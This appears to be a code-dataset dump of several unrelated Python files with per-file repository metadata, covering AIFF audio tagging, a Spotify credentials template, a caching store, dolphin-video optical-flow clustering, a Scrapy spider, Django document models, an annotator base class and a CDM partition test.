from mutagen.id3._util import ID3NoHeaderError, error as ID3Error
from mutagen._iff import (
IffChunk,
IffContainerChunkMixin,
IffFile,
IffID3,
InvalidChunk,
error as IffError,
)
from mutagen._util import (
convert_error,
loadfile,
endswith,
)
__all__ = ["AIFF", "Open", "delete"]
class error(IffError):
pass
# based on stdlib's aifc
_HUGE_VAL = 1.79769313486231e+308
def read_float(data):
"""Raises OverflowError"""
assert len(data) == 10
expon, himant, lomant = struct.unpack('>hLL', data)
sign = 1
if expon < 0:
sign = -1
expon = expon + 0x8000
if expon == himant == lomant == 0:
f = 0.0
elif expon == 0x7FFF:
raise OverflowError("inf and nan not supported")
else:
expon = expon - 16383
# this can raise OverflowError too
f = (himant * 0x100000000 + lomant) * pow(2.0, expon - 63)
return sign * f
class AIFFChunk(IffChunk):
"""Representation of a single IFF chunk"""
@classmethod
def parse_header(cls, header):
return struct.unpack('>4sI', header)
@classmethod
def get_class(cls, id):
if id == 'FORM':
return AIFFFormChunk
else:
return cls
def write_new_header(self, id_, size):
self._fileobj.write(pack('>4sI', id_, size))
def write_size(self):
self._fileobj.write(pack('>I', self.data_size))
class AIFFFormChunk(AIFFChunk, IffContainerChunkMixin):
"""The AIFF root chunk."""
def parse_next_subchunk(self):
return AIFFChunk.parse(self._fileobj, self)
def __init__(self, fileobj, id, data_size, parent_chunk):
if id != u'FORM':
raise InvalidChunk('Expected FORM chunk, got %s' % id)
AIFFChunk.__init__(self, fileobj, id, data_size, parent_chunk)
self.init_container()
class AIFFFile(IffFile):
"""Representation of a AIFF file"""
def __init__(self, fileobj):
# AIFF Files always start with the FORM chunk which contains a 4 byte
# ID before the start of other chunks
super().__init__(AIFFChunk, fileobj)
if self.root.id != u'FORM':
raise InvalidChunk("Root chunk must be a FORM chunk, got %s"
% self.root.id)
def __contains__(self, id_):
if id_ == 'FORM': # For backwards compatibility
return True
return super().__contains__(id_)
def __getitem__(self, id_):
if id_ == 'FORM': # For backwards compatibility
return self.root
return super().__getitem__(id_)
class AIFFInfo(StreamInfo):
"""AIFFInfo()
AIFF audio stream information.
Information is parsed from the COMM chunk of the AIFF file
Attributes:
length (`float`): audio length, in seconds
bitrate (`int`): audio bitrate, in bits per second
channels (`int`): The number of audio channels
sample_rate (`int`): audio sample rate, in Hz
bits_per_sample (`int`): The audio sample size
"""
length = 0
bitrate = 0
channels = 0
sample_rate = 0
@convert_error(IOError, error)
def __init__(self, fileobj):
"""Raises error"""
iff = AIFFFile(fileobj)
try:
common_chunk = iff[u'COMM']
except KeyError as e:
raise error(str(e))
data = common_chunk.read()
if len(data) < 18:
raise error
info = struct.unpack('>hLh10s', data[:18])
channels, frame_count, sample_size, sample_rate = info
try:
self.sample_rate = int(read_float(sample_rate))
except OverflowError:
raise error("Invalid sample rate")
if self.sample_rate < 0:
raise error("Invalid sample rate")
if self.sample_rate != 0:
self.length = frame_count / float(self.sample_rate)
self.bits_per_sample = sample_size
self.sample_size = sample_size # For backward compatibility
self.channels = channels
self.bitrate = channels * sample_size * self.sample_rate
def pprint(self):
return u"%d channel AIFF @ %d bps, %s Hz, %.2f seconds" % (
self.channels, self.bitrate, self.sample_rate, self.length)
class _IFFID3(IffID3):
"""A AIFF file with ID3v2 tags"""
def _load_file(self, fileobj):
return AIFFFile(fileobj)
@convert_error(IOError, error)
@loadfile(method=False, writable=True)
def delete(filething):
"""Completely removes the ID3 chunk from the AIFF file"""
try:
del AIFFFile(filething.fileobj)[u'ID3']
except KeyError:
pass
class AIFF(FileType):
"""AIFF(filething)
An AIFF audio file.
Arguments:
filething (filething)
Attributes:
tags (`mutagen.id3.ID3`)
info (`AIFFInfo`)
"""
_mimes = ["audio/aiff", "audio/x-aiff"]
@staticmethod
def score(filename, fileobj, header):
filename = filename.lower()
return (header.startswith(b"FORM") * 2 + endswith(filename, b".aif") +
endswith(filename, b".aiff") + endswith(filename, b".aifc"))
def add_tags(self):
"""Add an empty ID3 tag to the file."""
if self.tags is None:
self.tags = _IFFID3()
else:
raise error("an ID3 tag already exists")
@convert_error(IOError, error)
@loadfile()
def load(self, filething, **kwargs):
"""Load stream and tag information from a file."""
fileobj = filething.fileobj
try:
self.tags = _IFFID3(fileobj, **kwargs)
except ID3NoHeaderError:
self.tags = None
except ID3Error as e:
raise error(e)
else:
self.tags.filename = self.filename
fileobj.seek(0, 0)
self.info = AIFFInfo(fileobj)
Open = AIFF
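# A minimal usage sketch of the AIFF class defined above; "example.aiff" is a
# placeholder path.
if __name__ == "__main__":
    f = AIFF("example.aiff")
    print(f.info.pprint())  # e.g. "2 channel AIFF @ 1411200 bps, 44100 Hz, 12.34 seconds"
    if f.tags is None:
        f.add_tags()  # attach an empty ID3 tag so metadata can be added
    f.save()  # FileType.save() writes the (possibly new) tags back to the file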
| 25.99187
| 78
| 0.610416
| 4,688
| 0.733187
| 0
| 0
| 2,195
| 0.343291
| 0
| 0
| 1,951
| 0.30513
|
7c007a5d23b8a2015cedebc0918ddd73086265d1
| 398
|
py
|
Python
|
secrets_example.py
|
fuzzysearch404/SpotifyPlaylistScripts
|
17915742ca666edd8376f04d0e2687b207c32471
|
[
"MIT"
] | null | null | null |
secrets_example.py
|
fuzzysearch404/SpotifyPlaylistScripts
|
17915742ca666edd8376f04d0e2687b207c32471
|
[
"MIT"
] | 1
|
2021-11-03T13:40:55.000Z
|
2021-11-03T13:40:55.000Z
|
secrets_example.py
|
fuzzysearch404/SpotifyPlaylistScripts
|
17915742ca666edd8376f04d0e2687b207c32471
|
[
"MIT"
] | null | null | null |
# Spotify web application client ID
CLIENT_ID = 'your_client_id'
# Spotify web application client secret
CLIENT_SECRET = 'your_client_secret'
# Redirect URI. This can be any URI.
# However, you MUST add this URI to your Spotify web app's settings.
# Application settings -> Edit Settings -> Redirect URIs.
# Add it there and save the settings.
REDIRECT_URI = 'https://localhost:2020/done'
| 44.222222
| 70
| 0.753769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 345
| 0.866834
|
7c02196ff08fda517c472d6a6325f606f3df8cac
| 1,210
|
py
|
Python
|
tradeiobot/db/stores/abstractstore.py
|
hcv57/tradeio-bot
|
a4c9f96a104e20ca0618d8d787cfef3599c8ebb7
|
[
"MIT"
] | 2
|
2018-10-28T18:47:02.000Z
|
2019-10-09T14:52:04.000Z
|
tradeiobot/db/stores/abstractstore.py
|
hcv57/tradeio-bot
|
a4c9f96a104e20ca0618d8d787cfef3599c8ebb7
|
[
"MIT"
] | null | null | null |
tradeiobot/db/stores/abstractstore.py
|
hcv57/tradeio-bot
|
a4c9f96a104e20ca0618d8d787cfef3599c8ebb7
|
[
"MIT"
] | null | null | null |
import abc
class AbstractStore(abc.ABC):
def get(self, table, key, next_store_action):
value = self.do_get(table, key)
if not value:
value = next_store_action(table, key)
if value: # then update the local store
self.do_set(table, key, value)
return value
def get_all_as_dict(self, table, next_store_action):
values = self.do_get_all_as_dict(table)
if not values:
values = next_store_action(table)
if values:
for k, v in values:
self.do_set(table, k, v)
return values or dict()
def set(self, table, key, value, next_store_action):
self.do_set(table, key, value)
next_store_action(table, key, value)
def delete(self, table, key, next_store_action):
self.do_delete(table, key)
next_store_action(table, key)
@abc.abstractmethod
def do_get(self, table, key):
pass
@abc.abstractmethod
def do_get_all_as_dict(self, table):
pass
@abc.abstractmethod
def do_set(self, table, key, value):
pass
@abc.abstractmethod
def do_delete(self, table, key):
pass
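# A minimal in-memory subclass sketch showing how the do_* hooks plug into the
# get/set flow above; DictStore and the stubbed next_store_action callbacks are
# illustrative and not part of the project.
class DictStore(AbstractStore):
    def __init__(self):
        self._tables = {}
    def do_get(self, table, key):
        return self._tables.get(table, {}).get(key)
    def do_get_all_as_dict(self, table):
        return dict(self._tables.get(table, {}))
    def do_set(self, table, key, value):
        self._tables.setdefault(table, {})[key] = value
    def do_delete(self, table, key):
        self._tables.get(table, {}).pop(key, None)
if __name__ == "__main__":
    store = DictStore()
    store.set("prices", "BTC", 42, next_store_action=lambda table, key, value: None)
    print(store.get("prices", "BTC", next_store_action=lambda table, key: None))  # 42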
| 26.888889
| 56
| 0.602479
| 1,197
| 0.989256
| 0
| 0
| 281
| 0.232231
| 0
| 0
| 29
| 0.023967
|
7c037d89e3a9bf24f7302ca98b6d3dd08cac776e
| 11,062
|
py
|
Python
|
ML/meanvel.py
|
lewisfish/Triton-dolphin
|
bc7256485e1bd943e0b9b3017c214c82e26905f3
|
[
"MIT"
] | null | null | null |
ML/meanvel.py
|
lewisfish/Triton-dolphin
|
bc7256485e1bd943e0b9b3017c214c82e26905f3
|
[
"MIT"
] | null | null | null |
ML/meanvel.py
|
lewisfish/Triton-dolphin
|
bc7256485e1bd943e0b9b3017c214c82e26905f3
|
[
"MIT"
] | null | null | null |
from concurrent import futures
from itertools import repeat
import pathlib
from pathlib import Path
import pickle
import time
from typing import List, Tuple, Union
import cv2 as cv2
import hdbscan
import numpy as np
import pims
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler
from tqdm import tqdm
from gps import getAltitude
from ocr import getMagnification
def _getFullFileName(files: List[pathlib.PosixPath], target: str) -> pathlib.PosixPath:
'''Match a file to list of full filenames
Parameters
----------
files : List[pathlib.PosixPath]
List of file name to match to
target : str
File to be matched with full path
Returns
-------
file : pathlib.PosixPath
Full filename
'''
for file in files:
if target in str(file):
return file
def getFrames(file: str, position: int, offset: int) -> Tuple[List[pims.frame.Frame], List[int], float]:
"""Get 3 frames for optical flow analysis. Frames are serperated by +/- offset.
Central frame is at position.
Parameters
----------
file : str
Video file to get frames from
position : int
Position of central frame
offset : int
offset to get other frames for optical flow analysis
Returns
-------
Tuple[List[pims.frame.Frame], List[int], float]
Frames at position, +/- offset, list of frame positions, fps of video
"""
assert position > offset
video = pims.PyAVVideoReader(file)
frame0 = video[position - offset]
frame1 = video[position]
frame2 = video[position + offset]
return [frame0, frame1, frame2], [position - offset, position, position + offset], float(video._frame_rate)
def getFramesCV2(file: str, position: int, offset: int):
"""Get 3 frames for optical flow analysis using cv2. Frames are serperated by +/- offset.
Central frame is at position.
Parameters
----------
file : str
Video file to get frames from
position : int
Position of central frame
offset : int
offset to get other frames for optical flow analysis
Returns
-------
Tuple[List[np.ndarray], List[int], float]
Frames at position, +/- offset, list of frame positions, fps of video
"""
assert position >= offset
cap = cv2.VideoCapture(str(file))
fps = cap.get(cv2.CAP_PROP_FPS)
cap.set(cv2.CAP_PROP_POS_FRAMES, position-offset)
_, frame = cap.read()
frame0 = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
cap.set(cv2.CAP_PROP_POS_FRAMES, position)
_, frame = cap.read()
frame1 = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
cap.set(cv2.CAP_PROP_POS_FRAMES, position+offset)
_, frame = cap.read()
frame2 = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
return [frame0, frame1, frame2], [position - offset, position, position + offset], fps
def cropFrames(frames: List[pims.frame.Frame], box: List[int]) -> List[pims.frame.Frame]:
"""Crop frames.
Parameters
----------
frames : List[pims.frame.Frame]
List of frames to be cropped
box : List[int]
Dimensions, and location to crop: format [y0, x0, y1, x1]
Returns
-------
List[pims.frame.Frame]
List of cropped frames
"""
croppedFrames = []
xi = box[1]
xii = box[3]
yi = box[0]
yii = box[2]
for frame in frames:
croppedFrames.append(frame[yi:yii, xi:xii])
return croppedFrames
def preprocessFrame(frame: pims.frame.Frame, fg) -> Tuple[np.ndarray]:
"""Preprocess frame. Converts to grayscale and removes noise.
Parameters
----------
frame : pims.frame.Frame
Frame to be preprocessed
    fg : cv2.BackgroundSubtractor
        Background subtractor used to extract the foreground mask
    Returns
    -------
    Tuple[np.ndarray]
        Dilated binary (foreground) image and the grayscale frame
"""
gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
fgmask = fg.apply(gray)
blur = cv2.GaussianBlur(fgmask, (5, 5), 0)
    _, thresh = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)
    dilated = cv2.dilate(thresh, None, iterations=3)
return dilated, gray
def processContours(contours: List[float], contourpoints: List[List[float]], frame: pims.frame.Frame, debug=False) -> Tuple[List[List[float]], pims.frame.Frame]:
"""Get bounding boxes for each contour.
Parameters
----------
contours : List[float]
List of contours to find bounding boxes for.
contourpoints : List[List[float]]
        Running list of contour centre points; new centres are appended to it.
frame : pims.frame.Frame
Frame from which the contours are from
debug : bool, optional
If true then draw bounding boxes
Returns
-------
Tuple[List[List[float]], pims.frame.Frame]
        List of contour centre points, and the (possibly annotated) frame
"""
for cnt in contours:
x, y, w, h = cv2.boundingRect(cnt)
cx = x + (w / 2)
cy = y + (h / 2)
contourpoints.append([cx, cy])
if debug:
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
return contourpoints, frame
def processFile(file: str) -> List[Union[str, int, List[float], int]]:
"""Open, read and process data from file.
Parameters
----------
file : str
File to read.
Returns
-------
List[Union[str, int, List[float], int]]
List of videoname, framenumber, bounding box, and label
"""
info = []
f = open(file, "r")
lines = f.readlines()[1:]
for line in lines:
name, framenum, *box, label, vel, kmeans, hdbscan = line.split(",")
framenum = int(framenum)
label = int(label)
box = [int(x) for x in box]
item = [name, framenum, box, label]
info.append(item)
return info
def trainParallel(workers=8):
"""Wrapper function for training HDBSCAN in parallel.
Parameters
----------
workers : int, optional
        Number of workers to use in parallel, default=8
"""
data = processFile("../data/train.csv")
with futures.ProcessPoolExecutor(workers) as executor:
res = list(tqdm(executor.map(train, data), total=len(data)))
velocities = []
for i in res:
velocities.extend(i)
# with open('velocities.npy', 'wb') as f:
# np.save(f, velocities)
# model = hdbscan.HDBSCAN(min_cluster_size=1000, cluster_selection_epsilon=0.2, min_samples=5, leaf_size=100, prediction_data=True).fit(np.array(velocities).reshape(-1, 1))
# import pickle
# with open('model.pickle', 'wb') as f:
# pickle.dump(model, f)
def train(info: Tuple[str, List[float], int], root="/data/lm959/data/", crop=False):
"""Training function for HDBSCAN. Actually does the optical flow and
returns the data needed for training.
Parameters
----------
info : Tuple[str, List[float], int]
Tuple of video filename, framenumber, bounding box of object, and label of object.
root : str, optional
Root of file system location where videos are stored.
crop : bool, optional
If true then crop frames to bounding box of object.
Returns
-------
velocitymeterPerSecond : np.ndarray
List of velocities in m/s
"""
lk_params = dict(winSize=(15, 15),
maxLevel=2,
criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))
fgbg = cv2.createBackgroundSubtractorMOG2()
root = Path(root)
videoFiles = list(root.glob("**/*.mp4"))
vidname, fnumber, box, label = info
fullname = _getFullFileName(videoFiles, vidname)
frames, framenums, fps = getFramesCV2(fullname, fnumber, offset=15)
contourpoints = []
fpsPerFrame = 1. / fps
alt = getAltitude(fullname, framenums[1], gpsdataPath="../data/gps/")
magn = getMagnification(frames[1])
dolphLength = 1714 * (magn / alt) + 16.5
dolphPixelPerSecond = dolphLength / 2.
if crop:
frames = cropFrames(frames, box)
frame = frames[0]
for i in range(0, 2):
dilated, gray1 = preprocessFrame(frame, fgbg)
contours, _ = cv2.findContours(dilated, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
contourpoints, frame = processContours(contours, contourpoints, frame)
p0 = np.array(contourpoints, np.float32)
gray2 = cv2.cvtColor(frames[i + 1], cv2.COLOR_RGB2GRAY)
try:
p1, _, _ = cv2.calcOpticalFlowPyrLK(gray1, gray2, p0, None, **lk_params)
diff = np.array(p1) - np.array(p0)
velocity = diff / fpsPerFrame
velocity = [np.sqrt(item[0]**2 + item[1]**2) for item in velocity]
frame = frames[1].copy()
contourpoints = []
        except Exception:
# velocity = np.array([0.])
# if not crop:
continue
velocitymeterPerSecond = velocity / dolphPixelPerSecond
return velocitymeterPerSecond
def calcLabels():
"""Summary
"""
from sklearn.cluster import KMeans
data = processFile("../data/train.csv")
data = data
workers = 8
with futures.ProcessPoolExecutor(workers) as executor:
res = list(tqdm(executor.map(train, data, repeat("/data/lm959/data/"), repeat(True)), total=len(data)))
with open('velocities.npy', "rb") as f:
arrays = np.load(f)
# model = hdbscan.HDBSCAN(min_cluster_size=1000, min_samples=5, leaf_size=100, prediction_data=True).fit(arrays.reshape(-1, 1))
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
TotalVelocity = scaler.fit_transform(arrays.reshape(-1, 1))
model = KMeans(n_clusters=6, random_state=0, max_iter=300, precompute_distances=True, algorithm='full').fit(np.array(TotalVelocity).reshape(-1, 1))
outshizz = []
for i, item in enumerate(res):
vels = np.mean(item)
test_labels = model.predict(vels.reshape(-1, 1))
tmp = [data[i][0], data[i][1], data[i][2][0], data[i][2][1], data[i][2][2], data[i][2][3], data[i][3], vels, test_labels[0]]
outshizz.append(tmp)
with open('train-data-kmeans.npy', 'wb') as f:
np.save(f, np.array(outshizz))
# def infer(vels, tmper):
# import pickle
# with open('model.pickle', "rb") as f:
# loaded_obj = pickle.load(f)
# test_labels, strengths = hdbscan.approximate_predict(loaded_obj, np.array(vels).reshape(-1, 1))
def elbowPlot():
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler
with open('velocities.npy', "rb") as f:
arrays = np.load(f)
scaler = StandardScaler()
TotalVelocity = scaler.fit_transform(arrays.reshape(-1, 1))
inertia = []
for i in range(1, 15):
print(i)
km = KMeans(n_clusters=i, random_state=0, max_iter=300, precompute_distances=True, algorithm='full')
km.fit(np.array(TotalVelocity).reshape(-1, 1))
inertia.append(km.inertia_)
# results = trainParallel(workers=6)
# calcLabels()
# elbowPlot()
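# A minimal entry-point sketch; the worker count is illustrative and assumes the
# training CSV, GPS data and videos referenced above are available on disk.
if __name__ == '__main__':
    trainParallel(workers=8)
    # calcLabels() and elbowPlot() can then be used to cluster and inspect
    # the extracted velocities.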
| 28.29156
| 176
| 0.626831
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,380
| 0.39595
|
7c088d45f5f62ebef1ceafec95293618d4108e74
| 390
|
py
|
Python
|
os_scrapy_record/spiders/__init__.py
|
zanachka/os-scrapy-record
|
03d0cafbea74c981a72d5d7c8a3e28f05e487689
|
[
"MIT"
] | 2
|
2020-05-13T12:55:01.000Z
|
2020-07-24T06:52:49.000Z
|
os_scrapy_record/spiders/__init__.py
|
zanachka/os-scrapy-record
|
03d0cafbea74c981a72d5d7c8a3e28f05e487689
|
[
"MIT"
] | 1
|
2020-05-22T09:03:04.000Z
|
2020-05-22T09:31:45.000Z
|
os_scrapy_record/spiders/__init__.py
|
zanachka/os-scrapy-record
|
03d0cafbea74c981a72d5d7c8a3e28f05e487689
|
[
"MIT"
] | 2
|
2020-07-21T00:54:09.000Z
|
2020-10-29T18:10:03.000Z
|
# This package will contain the spiders of your Scrapy project
#
# Please refer to the documentation for information on how to create and manage
# your spiders.
import scrapy
class ExampleSpider(scrapy.Spider):
"""ExampleSpider
    Auto generated by os-scrapy-cookiecutter
Run:
scrapy crawl example
"""
name = "example"
start_urls = ["http://example.com/"]
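    # A minimal parse callback sketch (not part of the generated template):
    # Scrapy calls it for each downloaded response; the yielded fields are
    # illustrative only.
    def parse(self, response):
        yield {
            "url": response.url,
            "title": response.css("title::text").get(),
        }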
| 19.5
| 79
| 0.697436
| 211
| 0.541026
| 0
| 0
| 0
| 0
| 0
| 0
| 294
| 0.753846
|
7c094dc9f6789987096d646f2920ee372eb6f1b8
| 3,409
|
py
|
Python
|
zero_paper/models.py
|
PLsergent/zero-paper
|
4663e0e9976447419b5da5cdd32e57dccfc32125
|
[
"MIT"
] | null | null | null |
zero_paper/models.py
|
PLsergent/zero-paper
|
4663e0e9976447419b5da5cdd32e57dccfc32125
|
[
"MIT"
] | null | null | null |
zero_paper/models.py
|
PLsergent/zero-paper
|
4663e0e9976447419b5da5cdd32e57dccfc32125
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
from django.dispatch import receiver
import os
import shutil
class Folder(models.Model):
name = models.CharField(max_length=128)
parent_folder = models.ForeignKey("self", null=True, blank=True, on_delete=models.CASCADE)
def __str__(self):
return f'{self.name}'
class Tag(models.Model):
name = models.CharField(max_length=128)
def __str__(self):
return f'{self.name}'
def upload_to(instance, filename):
upload_to = ""
if instance.folder:
upload_to = instance.folder.name + "/"
instance = instance.folder
while True:
if not instance.parent_folder:
break
upload_to = instance.parent_folder.name + "/" + upload_to
instance = instance.parent_folder
return "files/" + upload_to + filename
class Document(models.Model):
title = models.CharField(max_length=128)
docfile = models.FileField(upload_to=upload_to)
TYPES = (
('PDF', 'Pdf'),
('IMG', 'Image'),
('XLS', 'Excel'),
('DOCX', 'Docx'),
('TXT', 'Text')
)
doctype = models.CharField(max_length=128, choices=TYPES)
description = models.TextField(max_length=250, blank=True)
created = models.DateTimeField(editable=False)
updated = models.DateTimeField(editable=False)
folder = models.ForeignKey(Folder, null=True, blank=True, on_delete=models.CASCADE)
tags = models.ManyToManyField(Tag)
def save(self, *args, **kwargs):
''' On save, update timestamps '''
if not self.id:
self.created = timezone.now()
self.updated = timezone.now()
return super(Document, self).save(*args, **kwargs)
def __str__(self):
return f'{self.title}'
@receiver(models.signals.post_delete, sender=Document)
def auto_delete_file_on_delete(sender, instance, **kwargs):
"""
Deletes file from filesystem
when corresponding `Document` object is deleted.
"""
if instance.docfile:
if os.path.isfile(instance.docfile.path):
os.remove(instance.docfile.path)
@receiver(models.signals.pre_save, sender=Document)
def auto_delete_file_on_change(sender, instance, **kwargs):
"""
Deletes old file from filesystem
when corresponding `Document` object is updated
with new file.
"""
if not instance.pk:
return False
try:
old_file = Document.objects.get(pk=instance.pk).docfile
except Document.DoesNotExist:
return False
new_file = instance.docfile
if not old_file == new_file:
if os.path.isfile(old_file.path):
os.remove(old_file.path)
@receiver(models.signals.pre_save, sender=Document)
def auto_move_file_on_update(sender, instance, **kwargs):
"""
Move old file from filesystem
when corresponding `Document` object is updated
with new folder.
"""
if not instance.pk:
return False
try:
old_file = Document.objects.get(pk=instance.pk).docfile
old_folder = Document.objects.get(pk=instance.pk).folder
except Document.DoesNotExist:
return False
new_folder = instance.folder
if not old_folder == new_folder:
new_path = upload_to(instance, os.path.basename(old_file.path))
shutil.move(old_file.path, new_path)
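# A small illustration of how upload_to builds nested paths from unsaved model
# instances; it assumes a configured Django project and is shown as comments
# for documentation only.
# parent = Folder(name="invoices")
# child = Folder(name="2021", parent_folder=parent)
# doc = Document(title="scan", folder=child)
# upload_to(doc, "scan.pdf") # -> "files/invoices/2021/scan.pdf"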
| 29.903509
| 94
| 0.661484
| 1,272
| 0.37313
| 0
| 0
| 1,549
| 0.454385
| 0
| 0
| 490
| 0.143737
|
7c0a7ee8a1d12afb4a736f3531f18c61cfd4058f
| 100
|
py
|
Python
|
mr/request.py
|
chiselko6/MapReduce
|
dde409525b1fa121fd5ecefafc13414032c01f1c
|
[
"MIT"
] | 1
|
2021-03-11T22:18:56.000Z
|
2021-03-11T22:18:56.000Z
|
mr/request.py
|
chiselko6/MapReduce
|
dde409525b1fa121fd5ecefafc13414032c01f1c
|
[
"MIT"
] | null | null | null |
mr/request.py
|
chiselko6/MapReduce
|
dde409525b1fa121fd5ecefafc13414032c01f1c
|
[
"MIT"
] | null | null | null |
def is_success(code):
return code == 'ok'
def is_error_code(code):
return code == 'ERROR'
| 14.285714
| 26
| 0.64
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 11
| 0.11
|
7c0d4593b55079c9f02350a49f16e7cc7ca276e1
| 2,435
|
py
|
Python
|
acd-annotator-python/acd_annotator_python/acd_annotator.py
|
Alvearie/acd-extension-framework
|
04779a66dec3be9cd0f1899037eaba9c505d3edd
|
[
"Apache-2.0"
] | 2
|
2021-04-20T17:30:37.000Z
|
2021-11-28T01:03:27.000Z
|
acd-annotator-python/acd_annotator_python/acd_annotator.py
|
Alvearie/acd-extension-framework
|
04779a66dec3be9cd0f1899037eaba9c505d3edd
|
[
"Apache-2.0"
] | 2
|
2021-04-15T14:16:10.000Z
|
2021-04-16T16:45:58.000Z
|
acd-annotator-python/acd_annotator_python/acd_annotator.py
|
Alvearie/acd-extension-framework
|
04779a66dec3be9cd0f1899037eaba9c505d3edd
|
[
"Apache-2.0"
] | 4
|
2021-04-15T14:11:10.000Z
|
2021-08-10T19:19:46.000Z
|
# ***************************************************************** #
# #
# (C) Copyright IBM Corp. 2021 #
# #
# SPDX-License-Identifier: Apache-2.0 #
# #
# ***************************************************************** #
from abc import ABC, abstractmethod
import inspect
from fastapi import Request
from acd_annotator_python.container_model.main import UnstructuredContainer
from acd_annotator_python.container_model.main import StructuredContainer
class ACDAnnotator(ABC):
def __init_subclass__(cls, **kwargs):
"""
Make sure that any subclass that inherits ACDAnnotator
defines is_healthy() and annotate() as coroutines (with the async keyword).
        Forgetting the async keyword can lead to hard-to-track-down errors, so we do this check up front.
:param arg:
:param kwargs:
"""
super().__init_subclass__(**kwargs)
child_method = getattr(cls, "is_healthy")
assert inspect.iscoroutinefunction(child_method), f'The method {child_method} must be a coroutine ("async def")'
child_method = getattr(cls, "annotate")
assert inspect.iscoroutinefunction(child_method), f'The method {child_method} must be a coroutine ("async def")'
@abstractmethod
def on_startup(self, app):
"""Load any required resources when the server starts up. (Not async to allow io operations)"""
...
@abstractmethod
async def is_healthy(self, app):
"""Is this annotator healthy? This gives the annotator a chance to indicate that
resources failed to load correctly, etc."""
...
async def annotate(self, unstructured_container: UnstructuredContainer, request: Request):
"""
Apply annotator logic to the unstructured container, altering it in-place.
:param unstructured_container:
:param request:
:return:
"""
pass
async def annotate_structured(self, structured_container: StructuredContainer, request: Request):
"""
Apply logic to a structured container altering it in-place.
:param structured_container:
:param request:
:return:
"""
pass
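# A minimal subclass sketch illustrating the contract enforced above: the two
# abstract methods must be provided and the overridden coroutines must stay
# async. The annotator name and its trivial logic are illustrative only.
class NoOpAnnotator(ACDAnnotator):
    def on_startup(self, app):
        # a real annotator would load models or dictionaries here
        self.loaded = True
    async def is_healthy(self, app):
        return getattr(self, "loaded", False)
    async def annotate(self, unstructured_container: UnstructuredContainer, request: Request):
        # a real annotator would add annotations to the container in-place
        pass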
| 39.918033
| 120
| 0.561396
| 1,711
| 0.702669
| 0
| 0
| 367
| 0.150719
| 755
| 0.310062
| 1,485
| 0.609856
|
9fd0cbfeb51abe9f235403600ea433496b7820f2
| 14,396
|
py
|
Python
|
objectModel/Python/tests/persistence/cdmfolder/data_partition/test_data_partition.py
|
Microsoft/CDM
|
7ea59264d661356ca1b44c31a352753928d08b5f
|
[
"CC-BY-4.0",
"MIT"
] | 265
|
2018-03-04T04:47:50.000Z
|
2019-05-06T13:31:18.000Z
|
objectModel/Python/tests/persistence/cdmfolder/data_partition/test_data_partition.py
|
Microsoft/CDM
|
7ea59264d661356ca1b44c31a352753928d08b5f
|
[
"CC-BY-4.0",
"MIT"
] | 39
|
2018-03-21T16:57:12.000Z
|
2019-05-06T17:30:23.000Z
|
objectModel/Python/tests/persistence/cdmfolder/data_partition/test_data_partition.py
|
Microsoft/CDM
|
7ea59264d661356ca1b44c31a352753928d08b5f
|
[
"CC-BY-4.0",
"MIT"
] | 75
|
2018-03-09T20:33:13.000Z
|
2019-05-05T06:55:43.000Z
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import os
import unittest
from cdm.utilities.logging import logger
from cdm.enums import CdmObjectType, CdmStatusLevel, CdmIncrementalPartitionType
from cdm.objectmodel import CdmCorpusContext, CdmCorpusDefinition, CdmManifestDefinition, CdmEntityDefinition
from cdm.persistence.cdmfolder import ManifestPersistence
from cdm.persistence.cdmfolder.types import ManifestContent
from cdm.utilities import Constants
from tests.cdm.cdm_collection.cdm_collection_helper_functions import create_document_for_entity
from tests.common import async_test, TestHelper
class DataPartitionTest(unittest.TestCase):
test_subpath = os.path.join('Persistence', 'CdmFolder', 'DataPartition')
@async_test
    async def test_load_local_entity_with_data_partition(self):
content = TestHelper.get_input_file_content(self.test_subpath, 'test_load_local_entity_with_data_partition', 'entities.manifest.cdm.json')
manifest_content = ManifestContent()
manifest_content.decode(content)
cdm_manifest = ManifestPersistence.from_object(CdmCorpusContext(CdmCorpusDefinition(), None), 'entities', 'testNamespace', '/', manifest_content)
self.assertEqual(len(cdm_manifest.entities), 1)
self.assertEqual(cdm_manifest.entities[0].object_type, CdmObjectType.LOCAL_ENTITY_DECLARATION_DEF)
entity = cdm_manifest.entities[0]
self.assertEqual(len(entity.data_partitions), 2)
relative_partition = entity.data_partitions[0]
self.assertEqual(relative_partition.name, 'Sample data partition')
self.assertEqual(relative_partition.location, 'test/location')
# self.assertEqual(TimeUtils.GetFormattedDateString(relative_partition.LastFileModifiedTime), '2008-09-15T23:53:23.000Z')
self.assertEqual(len(relative_partition.exhibits_traits), 1)
self.assertEqual(relative_partition.specialized_schema, 'teststring')
test_list = relative_partition.arguments['test']
self.assertEqual(len(test_list), 3)
self.assertEqual(test_list[0], 'something')
self.assertEqual(test_list[1], 'somethingelse')
self.assertEqual(test_list[2], 'anotherthing')
key_list = relative_partition.arguments['KEY']
self.assertEqual(len(key_list), 1)
self.assertEqual(key_list[0], 'VALUE')
self.assertFalse('wrong' in relative_partition.arguments)
absolute_partition = entity.data_partitions[1]
self.assertEqual(absolute_partition.location, "local:/some/test/location")
@async_test
async def test_programmatically_create_partitions(self):
corpus = TestHelper.get_local_corpus(self.test_subpath, 'test_programmatically_create_partitions', no_input_and_output_folder=True)
manifest = corpus.make_object(CdmObjectType.MANIFEST_DEF, 'manifest')
entity = manifest.entities.append('entity')
relative_partition = corpus.make_object(CdmObjectType.DATA_PARTITION_DEF, 'relative partition')
relative_partition.location = 'relative/path'
relative_partition.arguments['test1'] = ['argument1']
relative_partition.arguments['test2'] = ['argument2', 'argument3']
